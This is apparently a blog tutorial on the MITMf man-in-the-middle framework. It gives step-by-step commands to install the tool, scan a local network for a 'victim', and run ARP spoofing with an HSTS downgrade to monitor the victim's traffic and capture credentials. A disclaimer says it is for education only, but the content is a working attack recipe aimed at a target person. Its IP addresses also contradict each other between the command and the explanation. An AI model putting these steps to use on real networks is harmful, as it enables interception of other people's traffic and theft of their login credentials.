Hello and welcome to GitcodeX
In this article you will learn what is MITMF and how to use it. How to downgrade HSTS security and get the deatils.
NOTE : This article is only for educational purpose, Never use this information for any kind of illegal purpose. If you will use this for illegal purpose then only you will be responsible for it.
So, Let's start..
What is HSTS ( HTTP Strict Transport Security ) :
HSTS is web security policy mechanism which helps to protect website against protocol downgrade attacks and cookie hijacking.
Let's know what is MITMF (man in the middle framwork) :
MITMF aims to provide a one-stop-shop for man-in-the-middle and network attacks while updating and improving existing attacks and techniques.
It's between almost completely re-written from scratch to provide a modular and easily extendible framwork that anyone can use to implement their own MITM attack.
The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, It also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
As of version 0.9.8 , MITMF supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
The configuration file can be on-the-fly while MITMF is running, the changes will be passed down through the framework : this alows you to tweak settings of plugins and server while performing an attack.
MITMF will capture FTP, IRC, POP, Telnet, SMTP, SNMP (commuity strings), NTLMv1/v2 (all supported protocols like HTTPSMB,LDAP etc.) and Kerberos credentials by using Net-Creds, Which is run on startup.
Now, Let's see How to install the tool in your system,
Step-1 : Install MITMF Tool in your system
apt-get install mitmf
after installing the tool in your system check its features by typing,
mitmf -h
This will show you all the features of the tool, and you will be able to use the tool.
Step-2 : Check your IP address and Interface name
ifconfig
This will show you a list of all interface connected with your system.
Step-3 : Find Target's IP and Gateway
netdiscover
this command will give you the list of all devices IP address and gateways which are connected in the same network with your device.
or we can say that it scans the local network and gives you the IP and gateway.
After running this command Copy the IP and gateway of your victim.
Step-4 : Start the Attack
mitmf --spoofing --arp -i eth0 --target 177.115.251 --gateway 132.168.43.1 --hsts
Here, in this command
eth0 is the ethernet name of your system.
target 177.115.151.251 is the IP address of your victim (Im using a random IP address for security purpose)
gateway 192.168.43.1 is the gateway of your victim, which you got from scanning your local network.
After running this command the attack has been started, and it will automatically run itself.
Now, all the traffic passes from the target system, will be monitered by you in the tool.
You can get all the information of your target in your terminal.
NOTE : This article is only for educational purpose, Never use this information for any kind of illegal purpose. If you will use this for illegal purpose then only you will be responcible for it. I will not be responcible for any kind of illegal action taken by you.
Thanks for reading ; )